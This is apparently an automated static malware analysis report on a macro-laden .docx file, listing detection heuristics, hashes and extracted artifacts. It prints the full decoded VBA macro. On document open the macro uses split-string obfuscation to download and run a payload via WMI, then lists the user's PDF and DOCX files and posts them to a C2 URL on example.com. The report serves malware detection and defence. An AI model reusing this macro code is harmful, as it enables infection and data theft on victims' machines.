Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 947cab564d239cec…

MALICIOUS

Office (OOXML) / .DOCX

19.2 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-06-19
MD5: 38e6e33fa949ea47e907e6d1156e86f6 SHA-1: b1b9680b3397f90231ebe537bedaa509a9919af2 SHA-256: 947cab564d239cec9e84c9c21692d96c6bdb141978af8575fb522431bb43cf31
350 Risk Score

Heuristics 9

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            objStream.Write objXMLHTTP.ResponseBody
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "/" & "/" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3333 bytes
SHA-256: 5afc07df0404d9b1122ceee265dc07bd2ea461a02b993f40b0674f232b3cd8b7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim objWMIService As Object
    Dim objProcess As Object
    Dim objFSO As Object
    Dim objFolder As Object
    Dim objFile As Object
    Dim strDocumentsPath As String
    Dim strPayloadURL As String
    Dim strPayloadPath As String
    Dim strC2Server As String
    Dim strDataToSend As String
    Dim objXMLHTTP As Object
    Dim objStream As Object
    
    ' Set paths and URLs
    strDocumentsPath = CreateObject("W" & "Script" & ".Shell").SpecialFolders("M" & "yD" & "ocuments")
    strPayloadURL = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "e" & "x" & "a" & "m" & "p" & "l" & "e" & ".c" & "o" & "m" & "/" & "p" & "a" & "y" & "l" & "o" & "a" & "d" & ".e" & "x" & "e"
    strPayloadPath = CreateObject("W" & "Script" & ".Shell").ExpandEnvironmentStrings("%A" & "P" & "P" & "D" & "A" & "T" & "A%") & "\" & "p" & "a" & "y" & "l" & "o" & "a" & "d" & ".e" & "x" & "e"
    strC2Server = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "e" & "x" & "a" & "m" & "p" & "l" & "e" & ".c" & "o" & "m" & "/" & "c" & "2"
    
    ' Download payload
    Set objXMLHTTP = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & ".X" & "M" & "L" & "H" & "T" & "T" & "P")
    objXMLHTTP.Open "G" & "E" & "T", strPayloadURL, False
    objXMLHTTP.Send
    
    If objXMLHTTP.Status = 200 Then
        Set objStream = CreateObject("A" & "D" & "O" & "D" & "B" & ".S" & "t" & "r" & "e" & "a" & "m")
        objStream.Type = 1 ' adTypeBinary
        objStream.Open
        objStream.Write objXMLHTTP.ResponseBody
        objStream.SaveToFile strPayloadPath, 2 ' adSaveCreateOverWrite
        objStream.Close
    End If
    
    ' Execute payload using WMI
    Set objWMIService = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "/" & "/" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
    Set objProcess = objWMIService.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
    objProcess.Create strPayloadPath, Null, Null, intProcessID
    
    ' Discovery: Enumerate .pdf and .docx files in Documents folder
    Set objFSO = CreateObject("S" & "c" & "r" & "i" & "p" & "t" & "i" & "n" & "g" & ".F" & "i" & "l" & "e" & "S" & "y" & "s" & "t" & "e" & "m" & "O" & "b" & "j" & "e" & "c" & "t")
    Set objFolder = objFSO.GetFolder(strDocumentsPath)
    
    For Each objFile In objFolder.Files
        If LCase(Right(objFile.Name, 4)) = ".p" & "d" & "f" Or LCase(Right(objFile.Name, 5)) = ".d" & "o" & "c" & "x" Then
            ' Collect metadata or contents (example: file name and size)
            strDataToSend = strDataToSend & "F" & "i" & "l" & "e" & ": " & objFile.Name & ", " & "S" & "i" & "z" & "e" & ": " & objFile.Size & vbCrLf
        End If
    Next
    
    ' Send collected data to C2 server
    Set objXMLHTTP = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & ".X" & "M" & "L" & "H" & "T" & "T" & "P")
    objXMLHTTP.Open "P" & "O" & "S" & "T", strC2Server, False
    objXMLHTTP.Send strDataToSend
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: b6079d2df4cd70db766ec65992cb59c3859f31b26adf5468a6983ec6882f8ffc